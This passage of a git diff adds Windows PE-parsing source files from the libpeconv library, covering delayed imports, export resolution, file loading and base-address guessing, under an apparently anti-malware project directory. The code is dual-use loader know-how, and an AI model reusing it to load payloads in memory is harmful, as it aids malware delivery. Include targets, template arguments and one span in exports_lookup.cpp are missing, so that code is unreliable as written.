+ std::cout << dll_name << std::endl; +#endif + if (is_64bit) { + return parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG64, desc, func_resolver); + } + else { + return parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG32, desc, func_resolver); + } + } + return true; +} +/* +bool peconv::load_delayed_imports(BYTE* modulePtr, ULONGLONG moduleBase, t_function_resolver* func_resolver) +{ + const bool is_64bit = peconv::is64bit(modulePtr); + bool is_loader64 = false; +#ifdef _WIN64 + is_loader64 = true; +#endif + if (is_64bit != is_loader64) { + std::cerr << "[ERROR] Loader/Payload bitness mismatch.\n"; + return false; + } + + const size_t module_size = peconv::get_image_size(modulePtr); + default_func_resolver default_res; + if (!func_resolver) { + func_resolver = (t_function_resolver*)&default_res; + } + size_t 
table_size = 0; + IMAGE_DELAYLOAD_DESCRIPTOR *first_desc = get_delayed_imps(modulePtr, module_size, table_size); + if (!first_desc) { + return false; + } +#ifdef _DEBUG + std::cout << "OK, table_size = " << table_size << std::endl; +#endif + size_t max_count = table_size / sizeof(IMAGE_DELAYLOAD_DESCRIPTOR); + for (size_t i = 0; i < max_count; i++) { + IMAGE_DELAYLOAD_DESCRIPTOR *desc = &first_desc[i]; + if (!validate_ptr(modulePtr, module_size, desc, sizeof(IMAGE_DELAYLOAD_DESCRIPTOR))) break; + if (desc->DllNameRVA == NULL) { + break; + } + ULONGLONG dll_name_rva = desc->DllNameRVA; + if (dll_name_rva > moduleBase) { + dll_name_rva -= moduleBase; + } + char* dll_name = (char*)((ULONGLONG) modulePtr + dll_name_rva); + if (!validate_ptr(modulePtr, module_size, dll_name, sizeof(char))) continue; +#ifdef _DEBUG + std::cout << dll_name << std::endl; +#endif + if (is_64bit) { +#ifdef _WIN64 + parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG64, desc, func_resolver); +#else + return false; +#endif + } + else { +#ifndef _WIN64 + parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG32, desc, func_resolver); +#else + return false; +#endif + } + } + return true; +} +*/ \ No newline at end of file diff --git a/ai_anti_malware/libpeconv/libpeconv/src/exported_func.cpp b/ai_anti_malware/libpeconv/libpeconv/src/exported_func.cpp new file mode 100644 index 0000000..f425782 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/exported_func.cpp @@ -0,0 +1,176 @@ +#include "peconv/exported_func.h" + +#include +#include +#include +#include + +using namespace peconv; + +std::string peconv::get_dll_shortname(const std::string& str) +{ + std::size_t len = str.length(); + std::size_t found = str.find_last_of("/\\"); + std::size_t ext = str.find_last_of('.'); + if (ext >= len) return ""; + + std::string name = str.substr(found+1, ext - (found+1)); + std::transform(name.begin(), name.end(), name.begin(), tolower); + 
return name; +} + +size_t peconv::forwarder_name_len(BYTE* fPtr) +{ + // names can be also mangled, i.e. MSVCRT.??0__non_rtti_object@std@@QAE@ABV01@@Z + bool has_dot = false; + size_t len = 0; + while ((*fPtr >= 'a' && *fPtr <= 'z') + || (*fPtr >= 'A' && *fPtr <= 'Z') + || (*fPtr >= '0' && *fPtr <= '9') + || (*fPtr == '.') + || (*fPtr == '_') + || (*fPtr == '#') + || (*fPtr == '@') + || (*fPtr == '?') + || (*fPtr == '-')) + { + if (*fPtr == '.') has_dot = true; + len++; + fPtr++; + } + if (*fPtr == '\0') { + if (!has_dot) { + return 0; //this is not a valid forwarder + } + return len; + } + return 0; +} + +std::string peconv::get_func_name(const std::string& str) +{ + std::size_t len = str.length(); + std::size_t ext = str.find_last_of("."); + if (ext >= len) return ""; + + std::string name = str.substr(ext+1, len - (ext+1)); + return name; +} + +std::string peconv::ordinal_to_string(DWORD func_ordinal) +{ + std::stringstream stream; + stream << "#"; + stream << std::dec << func_ordinal; + return stream.str(); +} + +bool peconv::is_ordinal_string(const std::string& func_name_str) +{ + if (func_name_str.length() < 2) return false; + return (func_name_str[0] == '#'); +} + +DWORD peconv::ordinal_string_to_val(const std::string& func_name_str) +{ + if (!is_ordinal_string(func_name_str)) return 0; + const char* func_name = func_name_str.c_str(); + return atoi(func_name + 1); +} + +std::string peconv::format_dll_func(const std::string& str) +{ + std::string dllName = get_dll_shortname(str); + std::string funcName = get_func_name(str); + if (dllName.length() == 0 || funcName.length() == 0) { + return ""; + } + std::transform(dllName.begin(), dllName.end(), dllName.begin(), tolower); + return dllName + "." 
+ funcName; +} + +ExportedFunc::ExportedFunc(std::string libName, std::string funcName, DWORD funcOrdinal) +{ + this->libName = ExportedFunc::formatName(libName); + this->funcName = funcName; + this->funcOrdinal = funcOrdinal; + this->isByOrdinal = false; +} + +ExportedFunc::ExportedFunc(std::string libName, DWORD funcOrdinal) +{ + this->libName = ExportedFunc::formatName(libName); + this->funcOrdinal = funcOrdinal; + this->isByOrdinal = true; +} + +ExportedFunc::ExportedFunc(const ExportedFunc& other) +{ + this->libName = other.libName; + this->funcName = other.funcName; + this->funcOrdinal = other.funcOrdinal; + this->isByOrdinal = other.isByOrdinal; +} + +ExportedFunc::ExportedFunc(const std::string &forwarderName) +{ + this->libName = get_dll_shortname(forwarderName); + std::string func_name_str = get_func_name(forwarderName); + if (func_name_str.length() < 2) { + this->funcOrdinal = -1; + this->funcName = ""; + this->isByOrdinal = false; +#ifdef _DEBUG + std::cerr << "Invalid function data" << std::endl; +#endif + return; + } + if (is_ordinal_string(func_name_str)) { + // it is an ordinal in a string form, i.e.: "COMBASE.#110" + this->funcOrdinal = peconv::ordinal_string_to_val(func_name_str); + this->isByOrdinal = true; + this->funcName = ""; + //std::cout << "[O] Adding forwarded func: " << forwarderName << " parsed: " << this->toString() << std::endl; + } else { + this->funcName = func_name_str; + this->isByOrdinal = false; + this->funcOrdinal = 0; + //std::cout << "[N] Adding forwarded func:" << this->toString() << std::endl; + } +} + +std::string ExportedFunc::formatName(std::string name) +{ + if (name.length() == 0 || name.length() == 0) { + return ""; + } + std::transform(name.begin(), name.end(), name.begin(), tolower); + return name; +} + +std::string ExportedFunc::toString() const +{ + if (!isValid()) { + return "[Invalid func]"; + } + std::stringstream stream; + stream << this->libName; + stream << "."; + if (!this->isByOrdinal) { + stream << 
this->funcName; + stream << " "; + } + stream << ordinal_to_string(this->funcOrdinal); + return stream.str(); +} + +std::string ExportedFunc::nameToString() const +{ + if (!isValid()) { + return ""; + } + if (this->isByOrdinal) { + return ordinal_to_string(this->funcOrdinal); + } + return this->funcName; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/exports_lookup.cpp b/ai_anti_malware/libpeconv/libpeconv/src/exports_lookup.cpp new file mode 100644 index 0000000..66d01f0 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/exports_lookup.cpp @@ -0,0 +1,193 @@ +#include "peconv/exports_lookup.h" + +#include + +/* +typedef struct _IMAGE_EXPORT_DIRECTORY { + DWORD Characteristics; + DWORD TimeDateStamp; + WORD MajorVersion; + WORD MinorVersion; + DWORD Name; + DWORD Base; + DWORD NumberOfFunctions; + DWORD NumberOfNames; + DWORD AddressOfFunctions; // RVA from base of image + DWORD AddressOfNames; // RVA from base of image + DWORD AddressOfNameOrdinals; // RVA from base of image +} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; +*/ + +#ifndef TO_LOWERCASE +#define TO_LOWERCASE(c1) c1 = (c1 <= 'Z' && c1 >= 'A') ? 
c1 = (c1 - 'A') + 'a': c1; +#endif + +bool is_wanted_func(LPSTR curr_name, LPSTR wanted_name) +{ + if (curr_name == NULL || wanted_name == NULL) return false; + + size_t wanted_name_len = strlen(wanted_name); + size_t curr_name_len = strlen(curr_name); + + if (curr_name_len != wanted_name_len) return false; + + for (size_t i = 0; i < wanted_name_len; i++) { + char c1 = curr_name[i]; + char c2 = wanted_name[i]; + TO_LOWERCASE(c1); + TO_LOWERCASE(c2); + if (c1 != c2) return false; + } + return true; +} + +bool is_ordinal(IMAGE_EXPORT_DIRECTORY *exp, LPSTR func_name) +{ + ULONGLONG base = exp->Base; + ULONGLONG max_ord = base + exp->NumberOfFunctions; + ULONGLONG name_ptr_val = (ULONGLONG)func_name; + if (name_ptr_val >= base && name_ptr_val < max_ord) { + return true; + } + return false; +} + +FARPROC get_export_by_ord(PVOID modulePtr, IMAGE_EXPORT_DIRECTORY* exp, DWORD wanted_ordinal) +{ + SIZE_T functCount = exp->NumberOfFunctions; + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD ordBase = exp->Base; + + //go through names: + for (DWORD i = 0; i < functCount; i++) { + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + BYTE* fPtr = (BYTE*) modulePtr + (*funcRVA); //pointer to the function + DWORD ordinal = ordBase + i; + if (ordinal == wanted_ordinal) { + if (peconv::forwarder_name_len(fPtr) > 1) { + std::cerr << "[!] Forwarded function: ["<< wanted_ordinal << " -> "<< fPtr << "] cannot be resolved!" 
<< std::endl; + return NULL; // this function is forwarded, cannot be resolved + } + return (FARPROC) fPtr; //return the pointer to the found function + } + } + return NULL; +} + +size_t peconv::get_exported_names(PVOID modulePtr, std::vector &names_list) +{ + IMAGE_EXPORT_DIRECTORY* exp = peconv::get_export_directory((HMODULE) modulePtr); + if (exp == 0) return 0; + + SIZE_T namesCount = exp->NumberOfNames; + DWORD funcNamesListRVA = exp->AddressOfNames; + + //go through names: + SIZE_T i = 0; + for (i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + + LPSTR name = (LPSTR)(*nameRVA + (BYTE*) modulePtr); + if (IsBadReadPtr(name, 1)) break; // this shoudld not happen. maybe the PE file is corrupt? + + names_list.push_back(name); + } + return i; +} + +//WARNING: doesn't work for the forwarded functions. +FARPROC peconv::get_exported_func(PVOID modulePtr, LPSTR wanted_name) +{ + IMAGE_EXPORT_DIRECTORY* exp = peconv::get_export_directory((HMODULE) modulePtr); + if (exp == NULL) return NULL; + + SIZE_T namesCount = exp->NumberOfNames; + + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD funcNamesListRVA = exp->AddressOfNames; + DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals; + + if (is_ordinal(exp, wanted_name)) { +#ifdef _DEBUG + std::cerr << "[*] Getting function by ordinal" << std::endl; +#endif + const DWORD ordinal = MASK_TO_DWORD((ULONG_PTR)wanted_name); + return get_export_by_ord(modulePtr, exp, ordinal); + } + if (IsBadReadPtr(wanted_name, 1)) { + std::cerr << "[-] Invalid pointer to the name" << std::endl; + return NULL; + } + + //go through names: + for (SIZE_T i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*) modulePtr + i * sizeof(WORD)); + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + (*nameIndex) * sizeof(DWORD)); + + LPSTR name = 
(LPSTR)(*nameRVA + (BYTE*) modulePtr); + BYTE* fPtr = (BYTE*) modulePtr + (*funcRVA); //pointer to the function + + if (!is_wanted_func(name, wanted_name)) { + continue; //this is not the function we are looking for + } + if (forwarder_name_len(fPtr) > 1) { + std::cerr << "[!] Forwarded function: ["<< name << " -> "<< fPtr << "] cannot be resolved!" << std::endl; + return NULL; // this function is forwarded, cannot be resolved + } + return (FARPROC) fPtr; //return the pointer to the found function + } + //function not found + std::cerr << "Function not found!" << std::endl; + return NULL; +} + +FARPROC peconv::export_based_resolver::resolve_func(LPSTR lib_name, LPSTR func_name) +{ + HMODULE libBasePtr = LoadLibraryA(lib_name); + if (libBasePtr == NULL) { + std::cerr << "Could not load the library!" << std::endl; + return NULL; + } + + FARPROC hProc = get_exported_func(libBasePtr, func_name); + + if (hProc == NULL) { +#ifdef _DEBUG + if (!IsBadReadPtr(func_name, 1)) { + std::cerr << "[!] Cound not get the function: "<< func_name <<" from exports!" << std::endl; + } else { + std::cerr << "[!] Cound not get the function: "<< MASK_TO_DWORD((ULONG_PTR)func_name) <<" from exports!" << std::endl; + } + std::cerr << "[!] Falling back to the default resolver..." 
<Name); + if (IsBadReadPtr(module_name, 1)) { + return NULL; + } + size_t len = peconv::forwarder_name_len((BYTE*) module_name); + if (len > 1) { + return module_name; + } + return NULL; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/exports_mapper.cpp b/ai_anti_malware/libpeconv/libpeconv/src/exports_mapper.cpp new file mode 100644 index 0000000..2b38e55 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/exports_mapper.cpp @@ -0,0 +1,269 @@ +#include "peconv/exports_mapper.h" +#include +#include + + +using namespace peconv; + +void ExportsMapper::print_va_to_func(std::stringstream &stream) const +{ + std::map>::const_iterator itr; + + for (itr = va_to_func.begin(); itr != va_to_func.end(); ++itr) { + + stream << std::hex << itr->first << " :\n"; + + std::set::const_iterator itr2; + const std::set &funcs = itr->second; + + for (itr2 = funcs.begin(); itr2 != funcs.end(); ++itr2) { + stream << "\t" << itr2->toString() << "\n"; + } + } +} + +void ExportsMapper::print_func_to_va(std::stringstream &stream) const +{ + std::map::const_iterator itr; + for (itr = func_to_va.begin(); itr != func_to_va.end(); ++itr) { + stream << itr->first.toString() << " : " + << std::hex << itr->second << "\n"; + } +} + +ULONGLONG rebase_va(ULONGLONG va, ULONGLONG currBase, ULONGLONG targetBase) +{ + if (currBase == targetBase) { + return va; + } + ULONGLONG rva = va - (ULONGLONG) currBase; + return rva + targetBase; +} + +size_t ExportsMapper::make_ord_lookup_tables( + PVOID modulePtr, + size_t moduleSize, + std::map &va_to_ord + ) +{ + IMAGE_EXPORT_DIRECTORY* exp = peconv::get_export_directory((HMODULE) modulePtr); + if (exp == NULL) return 0; + + SIZE_T functCount = exp->NumberOfFunctions; + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD ordBase = exp->Base; + + //go through names: + for (DWORD i = 0; i < functCount; i++) { + DWORD* recordRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + if (*recordRVA == 0) { +#ifdef _DEBUG + std::cout << 
">>> Skipping 0 function address at RVA:" << std::hex << (BYTE*)recordRVA - (BYTE*)modulePtr<< "(ord)\n"; +#endif + //skip if the function RVA is 0 (empty export) + continue; + } + if (!peconv::validate_ptr(modulePtr, moduleSize, recordRVA, sizeof(DWORD))) { + break; + } + DWORD ordinal = ordBase + i; + va_to_ord[recordRVA] = ordinal; + } + return functCount; +} + +size_t ExportsMapper::resolve_forwarders(const ULONGLONG va, ExportedFunc &currFunc) +{ + size_t resolved = 0; + //resolve forwarders of this function (if any): + std::map>::iterator fItr = forwarders_lookup.find(currFunc); + if (fItr != forwarders_lookup.end()) { + //printf("[+] Forwarders (%d):\n", fItr->second.size()); + std::set::iterator sItr; + for (sItr = fItr->second.begin(); sItr != fItr->second.end(); ++sItr) { + //printf("-> %s\n", sItr->c_str()); + associateVaAndFunc(va, *sItr); + resolved++; + } + } + return resolved; +} + +bool ExportsMapper::add_forwarded(ExportedFunc &currFunc, DWORD callRVA, PBYTE modulePtr, size_t moduleSize) +{ + PBYTE fPtr = modulePtr + callRVA; + if (!peconv::validate_ptr(modulePtr, moduleSize, fPtr, 1)) { + return false; + } + if (peconv::forwarder_name_len(fPtr) < 1) { + return false; //not forwarded + } + std::string forwardedFunc = format_dll_func((char*)fPtr); + if (forwardedFunc.length() == 0) { + return false; //not forwarded + } + + ExportedFunc forwarder(forwardedFunc); + if (!forwarder.isValid()) { +#ifdef _DEBUG + std::cerr << "Skipped invalid forwarder" << std::endl; +#endif + return false; + } + forwarders_lookup[forwarder].insert(currFunc); + + if (func_to_va[forwarder] != 0) { + ULONGLONG va = func_to_va[forwarder]; + associateVaAndFunc(va, currFunc); + } + return true; +} + +DWORD get_ordinal(PDWORD recordPtr, std::map &va_to_ord) +{ + std::map::iterator ord_itr = va_to_ord.find(recordPtr); + if (ord_itr == va_to_ord.end()) { + //ordinal not found + return -1; + } + DWORD ordinal = ord_itr->second; + va_to_ord.erase(ord_itr); + return ordinal; +} + 
+bool ExportsMapper::add_to_maps(ULONGLONG va, ExportedFunc &currFunc) +{ + associateVaAndFunc(va, currFunc); + resolve_forwarders(va, currFunc); + return true; +} + +bool is_valid_export_table(IMAGE_EXPORT_DIRECTORY* exp, HMODULE modulePtr, const size_t module_size) +{ + if (exp == nullptr) return false; + + const SIZE_T namesCount = exp->NumberOfNames; + const SIZE_T funcCount = exp->NumberOfFunctions; + + const DWORD funcsListRVA = exp->AddressOfFunctions; + const DWORD funcNamesListRVA = exp->AddressOfNames; + const DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals; + + for (DWORD i = 0; i < funcCount; i++) { + DWORD* recordRVA = (DWORD*)(funcsListRVA + (BYTE*)modulePtr + i * sizeof(DWORD)); + if (*recordRVA == 0) { + //skip if the function RVA is 0 (empty export) + continue; + } + if (!peconv::validate_ptr(modulePtr, module_size, recordRVA, sizeof(DWORD))) { + return false; + } + } + + for (SIZE_T i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*)modulePtr + i * sizeof(DWORD)); + WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*)modulePtr + i * sizeof(WORD)); + if ((!peconv::validate_ptr(modulePtr, module_size, nameRVA, sizeof(DWORD))) + || (!peconv::validate_ptr(modulePtr, module_size, nameIndex, sizeof(WORD)))) + { + return false; + } + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*)modulePtr + (*nameIndex) * sizeof(DWORD)); + if (!peconv::validate_ptr(modulePtr, module_size, funcRVA, sizeof(DWORD))) + { + return false; + } + } + return true; +} + +ExportsMapper::ADD_FUNC_RES ExportsMapper::add_function_to_lookup(HMODULE modulePtr, ULONGLONG moduleBase, size_t moduleSize, ExportedFunc &currFunc, DWORD callRVA) +{ + if (add_forwarded(currFunc, callRVA, (BYTE*)modulePtr, moduleSize)) { +#ifdef _DEBUG + char* fPtr = (char*)modulePtr + callRVA; + std::cout << "FWD " << currFunc.toString() << " -> " << fPtr << "\n"; +#endif + return ExportsMapper::RES_FORWARDED; + } + + ULONGLONG callVa = callRVA + moduleBase; + if 
(!peconv::validate_ptr((BYTE*)moduleBase, moduleSize, (BYTE*)callVa, sizeof(ULONGLONG))) { + // this may happen when the function was forwarded and it is already filled +#ifdef _DEBUG + std::cout << "Validation failed: " << currFunc.toString() << "\n"; +#endif + return ExportsMapper::RES_INVALID; + } + //not forwarded, simple case: + add_to_maps(callVa, currFunc); + return ExportsMapper::RES_MAPPED; +} + +size_t ExportsMapper::add_to_lookup(std::string moduleName, HMODULE modulePtr, ULONGLONG moduleBase) +{ + IMAGE_EXPORT_DIRECTORY* exp = get_export_directory(modulePtr); + if (exp == NULL) { + return 0; + } + size_t module_size = peconv::get_image_size(reinterpret_cast(modulePtr)); + if (!is_valid_export_table(exp, modulePtr, module_size)) { + return 0; + } + std::string dllName = get_dll_shortname(moduleName); + this->dll_shortname_to_path[dllName] = moduleName; + + std::map va_to_ord; + size_t functCount = make_ord_lookup_tables(modulePtr, module_size, va_to_ord); + + //go through names: + + size_t forwarded_ctr = 0; + SIZE_T namesCount = exp->NumberOfNames; + + DWORD funcsListRVA = exp->AddressOfFunctions; + DWORD funcNamesListRVA = exp->AddressOfNames; + DWORD namesOrdsListRVA = exp->AddressOfNameOrdinals; + + size_t mapped_ctr = 0; + + for (SIZE_T i = 0; i < namesCount; i++) { + DWORD* nameRVA = (DWORD*)(funcNamesListRVA + (BYTE*) modulePtr + i * sizeof(DWORD)); + WORD* nameIndex = (WORD*)(namesOrdsListRVA + (BYTE*) modulePtr + i * sizeof(WORD)); + DWORD* funcRVA = (DWORD*)(funcsListRVA + (BYTE*) modulePtr + (*nameIndex) * sizeof(DWORD)); + if (*funcRVA == 0) { +#ifdef _DEBUG + std::cout << ">>> Skipping 0 function address at RVA:" << std::hex << (BYTE*)funcRVA - (BYTE*)modulePtr << "(name)\n"; +#endif + //skip if the function RVA is 0 (empty export) + continue; + } + + LPSTR name = (LPSTR)(*nameRVA + (BYTE*) modulePtr); + if (!peconv::validate_ptr(modulePtr, module_size, name, sizeof(char))) break; + + DWORD funcOrd = get_ordinal(funcRVA, va_to_ord); + DWORD 
callRVA = *funcRVA; + ExportedFunc currFunc(dllName, name, funcOrd); + + int res = add_function_to_lookup(modulePtr, moduleBase, module_size, currFunc, callRVA); + if (res == ExportsMapper::RES_FORWARDED) forwarded_ctr++; + if (res == ExportsMapper::RES_MAPPED) mapped_ctr++; + } + //go through unnamed functions exported by ordinals: + std::map::iterator ord_itr = va_to_ord.begin(); + for (;ord_itr != va_to_ord.end(); ++ord_itr) { + + DWORD* funcRVA = ord_itr->first; + DWORD callRVA = *funcRVA; + ExportedFunc currFunc(dllName, ord_itr->second); + + int res = add_function_to_lookup(modulePtr, moduleBase, module_size, currFunc, callRVA); + if (res == ExportsMapper::RES_FORWARDED) forwarded_ctr++; + if (res == ExportsMapper::RES_MAPPED) mapped_ctr++; + } +#ifdef _DEBUG + std::cout << "Finished exports parsing, mapped: "<< mapped_ctr << " forwarded: " << forwarded_ctr << std::endl; +#endif + return mapped_ctr; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/file_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/file_util.cpp new file mode 100644 index 0000000..68aecca --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/file_util.cpp @@ -0,0 +1,147 @@ +#include "peconv/file_util.h" +#include "peconv/buffer_util.h" + +#include +#ifdef _DEBUG + #include +#endif + +//load file content using MapViewOfFile +peconv::ALIGNED_BUF peconv::load_file(IN const char *filename, OUT size_t &read_size) +{ + HANDLE file = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); + if(file == INVALID_HANDLE_VALUE) { +#ifdef _DEBUG + std::cerr << "Could not open file!" << std::endl; +#endif + return nullptr; + } + HANDLE mapping = CreateFileMapping(file, 0, PAGE_READONLY, 0, 0, 0); + if (!mapping) { +#ifdef _DEBUG + std::cerr << "Could not create mapping!" 
<< std::endl; +#endif + CloseHandle(file); + return nullptr; + } + BYTE *dllRawData = (BYTE*) MapViewOfFile(mapping, FILE_MAP_READ, 0, 0, 0); + if (!dllRawData) { +#ifdef _DEBUG + std::cerr << "Could not map view of file" << std::endl; +#endif + CloseHandle(mapping); + CloseHandle(file); + return nullptr; + } + size_t r_size = GetFileSize(file, 0); + if (read_size != 0 && read_size <= r_size) { + r_size = read_size; + } + if (IsBadReadPtr(dllRawData, r_size)) { + std::cerr << "[-] Mapping of " << filename << " is invalid!" << std::endl; + UnmapViewOfFile(dllRawData); + CloseHandle(mapping); + CloseHandle(file); + return nullptr; + } + peconv::ALIGNED_BUF localCopyAddress = peconv::alloc_aligned(r_size, PAGE_READWRITE); + if (localCopyAddress != nullptr) { + memcpy(localCopyAddress, dllRawData, r_size); + read_size = r_size; + } else { + read_size = 0; +#ifdef _DEBUG + std::cerr << "Could not allocate memory in the current process" << std::endl; +#endif + } + UnmapViewOfFile(dllRawData); + CloseHandle(mapping); + CloseHandle(file); + return localCopyAddress; +} + +//load file content using ReadFile +peconv::ALIGNED_BUF peconv::read_from_file(IN const char *in_path, IN OUT size_t &read_size) +{ + HANDLE file = CreateFileA(in_path, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); + if (file == INVALID_HANDLE_VALUE) { +#ifdef _DEBUG + std::cerr << "Cannot open the file for reading!" << std::endl; +#endif + return nullptr; + } + size_t r_size = static_cast(GetFileSize(file, 0)); + if (read_size != 0 && read_size <= r_size) { + r_size = read_size; + } + PBYTE buffer = peconv::alloc_pe_buffer(r_size, PAGE_READWRITE); + if (buffer == nullptr) { +#ifdef _DEBUG + std::cerr << "Allocation has failed!" << std::endl; +#endif + return nullptr; + } + DWORD out_size = 0; + if (!ReadFile(file, buffer, r_size, &out_size, nullptr)) { +#ifdef _DEBUG + std::cerr << "Reading failed!" 
<< std::endl; +#endif + peconv::free_pe_buffer(buffer, r_size); + buffer = nullptr; + read_size = 0; + } else { + read_size = r_size; + } + CloseHandle(file); + return buffer; +} + +//save the given buffer into a file +bool peconv::dump_to_file(IN const char *out_path, IN PBYTE dump_data, IN size_t dump_size) +{ + if (!out_path || !dump_data || !dump_size) return false; + + HANDLE file = CreateFileA(out_path, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); + if (file == INVALID_HANDLE_VALUE) { +#ifdef _DEBUG + std::cerr << "Cannot open the file for writing!" << std::endl; +#endif + return false; + } + DWORD written_size = 0; + bool is_dumped = false; + if (WriteFile(file, dump_data, (DWORD) dump_size, &written_size, nullptr)) { + is_dumped = true; + } +#ifdef _DEBUG + else { + std::cerr << "Failed to write to the file : " << out_path << std::endl; + } +#endif + CloseHandle(file); + return is_dumped; +} + +//free the buffer allocated by load_file/read_from_file +void peconv::free_file(IN peconv::ALIGNED_BUF buffer) +{ + peconv::free_aligned(buffer); +} + +std::string peconv::get_file_name(IN const std::string str) +{ + size_t found = str.find_last_of("/\\"); + if (found == std::string::npos) { + return str; + } + return str.substr(found + 1); +} + +std::string peconv::get_directory_name(IN const std::string str) +{ + size_t found = str.find_last_of("/\\"); + if (found == std::string::npos) { + return ""; + } + return str.substr(0, found); +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/find_base.cpp b/ai_anti_malware/libpeconv/libpeconv/src/find_base.cpp new file mode 100644 index 0000000..3dad3a0 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/find_base.cpp @@ -0,0 +1,125 @@ +#include +#include +#include +#include +#include +#include + +namespace peconv { + + class CollectCodeRelocs : public RelocBlockCallback + { + public: + CollectCodeRelocs(BYTE *pe_buffer, size_t buffer_size, IN bool _is64bit, OUT std::set 
&_relocs) + : RelocBlockCallback(_is64bit), relocs(_relocs), + peBuffer(pe_buffer), bufferSize(buffer_size) + { + codeSec = getCodeSection(peBuffer, bufferSize); + } + + virtual bool processRelocField(ULONG_PTR relocField) + { + if (!codeSec) return false; + + ULONGLONG reloc_addr = (relocField - (ULONGLONG)peBuffer); + const bool is_in_code = (reloc_addr >= codeSec->VirtualAddress) && (reloc_addr < codeSec->Misc.VirtualSize); + if (!is64bit && !is_in_code) { + // in case of 32 bit PEs process only the relocations form the code section + return true; + } + ULONGLONG rva = 0; + if (is64bit) { + ULONGLONG* relocateAddr = (ULONGLONG*)((ULONG_PTR)relocField); + rva = (*relocateAddr); + //std::cout << std::hex << (relocField - (ULONGLONG)peBuffer) << " : " << rva << std::endl; + } + else { + DWORD* relocateAddr = (DWORD*)((ULONG_PTR)relocField); + rva = ULONGLONG(*relocateAddr); + //std::cout << std::hex << (relocField - (ULONGLONG)peBuffer) << " : " << rva << std::endl; + } + relocs.insert(rva); + return true; + } + + static PIMAGE_SECTION_HEADER getCodeSection(BYTE *peBuffer, size_t bufferSize) + { + size_t sec_count = peconv::get_sections_count(peBuffer, bufferSize); + for (size_t i = 0; i < sec_count; i++) { + PIMAGE_SECTION_HEADER hdr = peconv::get_section_hdr(peBuffer, bufferSize, i); + if (!hdr) break; + if (hdr->VirtualAddress == 0 || hdr->SizeOfRawData == 0) { + continue; + } + if (hdr->Characteristics & IMAGE_SCN_MEM_EXECUTE) { + return hdr; + } + } + return nullptr; + } + + protected: + std::set &relocs; + PIMAGE_SECTION_HEADER codeSec; + + BYTE *peBuffer; + size_t bufferSize; + }; +} + +ULONGLONG peconv::find_base_candidate(IN BYTE* modulePtr, IN size_t moduleSize) +{ + if (moduleSize == 0) { + moduleSize = peconv::get_image_size((const BYTE*)modulePtr); + } + if (moduleSize == 0) return 0; + + bool is64 = peconv::is64bit(modulePtr); + std::set relocs; + peconv::CollectCodeRelocs callback(modulePtr, moduleSize, is64, relocs); + if 
(!peconv::process_relocation_table(modulePtr, moduleSize, &callback)) { + return 0; + } + if (relocs.size() == 0) { + return 0; + } + + PIMAGE_SECTION_HEADER hdr = peconv::CollectCodeRelocs::getCodeSection(modulePtr, moduleSize); + if (!hdr) { + return 0; + } + const ULONGLONG mask = ~ULONGLONG(0xFFFF); + std::mapbase_candidates; + + std::set::iterator itr = relocs.begin(); + + for (itr = relocs.begin(); itr != relocs.end(); ++itr) { + const ULONGLONG guessed_base = (*itr) & mask; + std::map::iterator found = base_candidates.find(guessed_base); + if (found == base_candidates.end()) { + base_candidates[guessed_base] = 0; + } + base_candidates[guessed_base]++; + } + ULONGLONG most_freqent = 0; + size_t max_freq = 0; + std::map::iterator mapItr; + for (mapItr = base_candidates.begin(); mapItr != base_candidates.end(); ++mapItr) { + if (mapItr->second >= max_freq) { + most_freqent = mapItr->first; + max_freq = mapItr->second; + } + } + for (itr = relocs.begin(); itr != relocs.end(); ++itr) { + ULONGLONG first = *itr; + ULONGLONG first_base = first & mask; + if (first_base > most_freqent) { + break; + } + ULONGLONG delta = most_freqent - first_base; + if (delta < moduleSize) { + return first_base; + } + } + return 0; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.cpp b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.cpp new file mode 100644 index 0000000..26054e2 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/fix_dot_net_ep.cpp @@ -0,0 +1,144 @@ +#include "fix_dot_net_ep.h" +#include + +#include +#include + +class ListImportNames : public peconv::ImportThunksCallback +{ +public: + ListImportNames(BYTE* 